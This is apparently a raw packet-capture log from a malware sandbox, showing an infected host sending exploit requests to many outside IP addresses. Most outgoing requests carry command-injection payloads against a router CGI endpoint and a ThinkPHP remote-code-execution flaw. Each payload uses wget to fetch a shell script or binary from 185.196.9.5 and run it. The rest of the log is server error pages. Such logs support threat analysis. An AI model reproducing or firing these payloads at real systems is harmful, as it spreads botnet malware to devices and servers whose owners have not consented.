Feb 25, 2024 19:03:32.631730080 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
420	192.168.2.15	37962	31.30.55.117	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:33.843353987 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:03:34.045799971 CET	412	IN	HTTP/1.1 404 Not Found Date: Sun, 25 Feb 2024 19:04:50 GMT Server: Webs X-Frame-Options: SAMEORIGIN Cache-Control: no-cache Content-Length: 166 Content-Type: text/html Connection: keep-alive Keep-Alive: timeout=180, max=99 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
421	192.168.2.15	49818	31.200.83.247	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:33.859757900 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
422	192.168.2.15	58090	94.121.103.134	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:33.862245083 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
423	192.168.2.15	41434	94.120.101.123	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:34.074891090 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
424	192.168.2.15	51690	95.163.16.128	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:34.295618057 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:03:34.516175032 CET	410	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.10.2 Date: Sun, 25 Feb 2024 18:03:34 GMT Content-Type: text/html Content-Length: 195 Connection: keep-alive WWW-Authenticate: Basic realm="closed area" Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 31 20 41 75 74 68 6f 72 69 7a 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 31 20 41 75 74 68 6f 72 69 7a 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 30 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>401 Authorization Required</title></head><body bgcolor="white"><center><h1>401 Authorization Required</h1></center><hr><center>nginx/1.10.2</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
425	192.168.2.15	50506	94.120.152.238	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:34.296401024 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
426	192.168.2.15	42294	94.123.76.169	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:34.299038887 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
427	192.168.2.15	58620	95.174.53.61	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:34.310056925 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
428	192.168.2.15	49938	95.111.243.40	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:34.335755110 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:03:34.529366016 CET	1286	IN	HTTP/1.1 400 Bad Request Date: Sun, 25 Feb 2024 18:03:34 GMT Server: Apache Accept-Ranges: bytes Cache-Control: no-cache, no-store, must-revalidate Pragma: no-cache Expires: 0 Connection: close Content-Type: text/html Data Raw: 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 31 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 72 65 73 70 6f 6e 73 65 2d 69 6e 66 6f 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 43 43 43 43 43 43 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 63 6f 64 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 35 30 30 25 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 72 65 61 73 6f 6e 20 7b 0a 20 20 Data Ascii: <!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="0"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>400 Bad Request</title> <style type="text/css"> body { font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 1.428571429; background-color: #ffffff; color: #2F3230; padding: 0; margin: 0; } section, footer { display: block; padding: 0; margin: 0; } .container { margin-left: auto; margin-right: auto; padding: 0 10px; } .response-info { color: #CCCCCC; } .status-code { font-size: 500%; } .status-reason {
Feb 25, 2024 19:03:34.529398918 CET	1286	IN	Data Raw: 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 35 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 63 74 2d Data Ascii: font-size: 250%; display: block; } .contact-info, .reason-text { color: #000000; } .additional-info { background-repeat: no-repeat; background-co
Feb 25, 2024 19:03:34.529426098 CET	1286	IN	Data Raw: 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 6c 65 66 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 77 6f 72 64 2d 62 72 Data Ascii: { font-weight: bold; text-align: left; word-break: break-all; width: 100%; } .info-server address { text-align: left; } footer { text-align
Feb 25, 2024 19:03:34.529450893 CET	1286	IN	Data Raw: 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 68 65 61 64 69 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 36 32 70 78 20 30 20 30 20 39 38 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: } .info-heading { margin: 62px 0 0 98px; } .info-server address { text-align: left; position: absolute; right: 0; bottom: 0;
Feb 25, 2024 19:03:34.529500961 CET	1286	IN	Data Raw: 62 47 42 74 71 52 46 52 58 6f 36 2b 30 5a 35 59 51 68 35 4c 48 64 39 59 47 57 4f 73 46 2b 39 49 73 35 6f 51 58 63 74 5a 4b 62 76 64 41 41 74 62 48 48 4d 38 2b 47 4c 66 6f 6a 57 64 49 67 50 66 66 37 59 69 66 52 54 4e 69 5a 6d 75 73 57 2b 77 38 66 Data Ascii: bGBtqRFRXo6+0Z5YQh5LHd9YGWOsF+9Is5oQXctZKbvdAAtbHHM8+GLfojWdIgPff7YifRTNiZmusW+w8fDj1xdevNnbU3VFfTEL/W33pfH31cGYBpgW9Lba3Ic8C8iA77NLe514vu8BPj6/n3lCd/VkgKXGkwYUQHAaM+yQunBmNSwbRVYh+kOcgMhvRDB1Md20YfiR+UFfvdIizp2v1vVjt0usa1pmNzAX2IFl5/xaE9aqQGS
Feb 25, 2024 19:03:34.529517889 CET	1286	IN	Data Raw: 35 55 33 77 4d 78 69 6f 69 45 72 52 6d 32 6e 75 68 64 38 51 52 43 41 38 49 77 54 52 41 57 31 4f 37 50 41 73 62 74 43 50 79 4d 4d 67 4a 70 2b 31 2f 49 61 78 71 47 41 52 7a 72 46 74 74 70 68 55 52 2b 4d 76 45 50 53 78 2b 36 6d 2f 70 43 78 45 69 33 Data Ascii: 5U3wMxioiErRm2nuhd8QRCA8IwTRAW1O7PAsbtCPyMMgJp+1/IaxqGARzrFttphUR+MvEPSx+6m/pCxEi3Y7p485ESAVmuldvzSTKw2fqHSGM5hBW1IUI0f/LdONtEUKXGC95jK+Rg4QBVwNmlePZVjTxuo24kWMrQHg/nZzxDqmqFRFC799+dbEirMoVEXhVA07Y+GWNMOBCxIIpCgCpAX5KgHB6IQILHwE3HXk2XQVszdSkGE
Feb 25, 2024 19:03:34.529545069 CET	1096	IN	Data Raw: 4c 57 6b 51 38 77 6f 42 4b 79 52 2b 2b 64 55 54 73 75 45 4b 2b 4c 38 70 32 42 44 34 66 47 64 73 66 71 68 78 47 51 54 51 5a 6c 75 48 55 4c 58 72 52 73 55 46 66 42 45 30 4f 67 7a 49 6c 72 61 52 38 76 6b 77 36 71 6e 58 6d 75 44 53 46 38 52 67 53 38 Data Ascii: LWkQ8woBKyR++dUTsuEK+L8p2BD4fGdsfqhxGQTQZluHULXrRsUFfBE0OgzIlraR8vkw6qnXmuDSF8RgS8th+d+phci8FJf1fwapi44rFpfqTZAnW+JFRG3kf94Z+sSqdR1UIiI/dc/B6N/M9WsiADO00A3QU0hohX5RTdeCrstyT1WphURTBevBaV4iwYJGGctRDC1FsGaQ3RtGFfL4os34g6T+AkAT84bs0fX2weS88X7X6hX
Feb 25, 2024 19:03:34.529602051 CET	1286	IN	Data Raw: 34 30 30 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 73 74 61 74 75 73 2d 72 65 61 73 6f 6e 22 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: 400</span> <span class="status-reason">Bad Request</span> </section> <section class="contact-info"> Please forward this error screen to server.hostadv.com's <a href="mailto:server-admin@
Feb 25, 2024 19:03:34.529618979 CET	348	IN	Data Raw: 5f 63 6f 6e 74 65 6e 74 3d 6c 6f 67 6f 6c 69 6e 6b 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 34 30 30 72 65 66 65 72 72 61 6c 22 20 74 61 72 67 65 74 3d 22 63 70 61 6e 65 6c 22 20 74 69 74 6c 65 3d 22 63 50 61 6e 65 6c 2c 20 49 6e 63 2e 22 3e 0a Data Ascii: _content=logolink&utm_campaign=400referral" target="cpanel" title="cPanel, Inc."> <img src="/img-sys/powered_by_cpanel.svg" height="20" alt="cPanel, Inc." /> <div class="copyright">Copyright 2016 cPan

Session ID	Source IP	Source Port	Destination IP	Destination Port
429	192.168.2.15	51168	95.217.163.47	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:34.342087984 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:03:34.536235094 CET	115	IN	HTTP/1.1 400 Bad Request Content-Type: text/plain; charset=utf-8 Connection: close Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 Data Ascii: 400 Bad Request

Session ID	Source IP	Source Port	Destination IP	Destination Port
430	192.168.2.15	35622	95.216.155.17	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:34.344363928 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:03:34.541940928 CET	516	IN	HTTP/1.1 400 Bad Request Connection: close Content-Type: text/html Content-Length: 411 Data Raw: 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 3c 70 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 70 3e 3c 2f 68 31 3e 0a 20 20 20 20 49 6e 76 61 6c 69 64 20 48 54 54 50 20 56 65 72 73 69 6f 6e 20 26 23 78 32 37 3b 49 6e 76 61 6c 69 64 20 48 54 54 50 20 56 65 72 73 69 6f 6e 3a 20 26 71 75 6f 74 3b 68 69 6e 6b 5c 78 30 37 70 70 2f 69 6e 76 6f 6b 65 66 75 6e 63 74 69 6f 6e 26 61 6d 70 3b 66 75 6e 63 74 69 6f 6e 3d 63 61 6c 6c 5f 75 73 65 72 5f 66 75 6e 63 5f 61 72 72 61 79 26 61 6d 70 3b 76 61 72 73 5b 30 5d 3d 73 68 65 6c 6c 5f 65 78 65 63 26 61 6d 70 3b 76 61 72 73 5b 31 5d 5b 5d 3d 26 23 78 32 37 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 62 69 6e 73 2f 78 38 36 20 2d 4f 20 74 68 6f 6e 6b 70 68 70 20 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 68 6f 6e 6b 70 68 70 20 3b 20 2e 2f 74 68 6f 6e 6b 70 68 70 20 54 68 69 6e 6b 50 48 50 20 3b 20 72 6d 20 2d 72 66 20 74 68 69 6e 6b 70 68 70 26 23 78 32 37 3b 20 48 54 54 50 2f 31 2e 31 26 71 75 6f 74 3b 26 23 78 32 37 3b 0a 20 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html> <head> <title>Bad Request</title> </head> <body> <h1><p>Bad Request</p></h1> Invalid HTTP Version 'Invalid HTTP Version: "hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1"' </body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
431	192.168.2.15	41530	95.173.162.44	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:34.370742083 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:03:34.593530893 CET	903	IN	HTTP/1.1 400 Bad Request content-type: text/html cache-control: private, no-cache, max-age=0 pragma: no-cache content-length: 679 date: Sun, 25 Feb 2024 18:03:34 GMT server: LiteSpeed connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 30 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 42 61 64 20 52 65 71 75 65 73 74 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 49 74 20 69 73 20 6e 6f 74 20 61 20 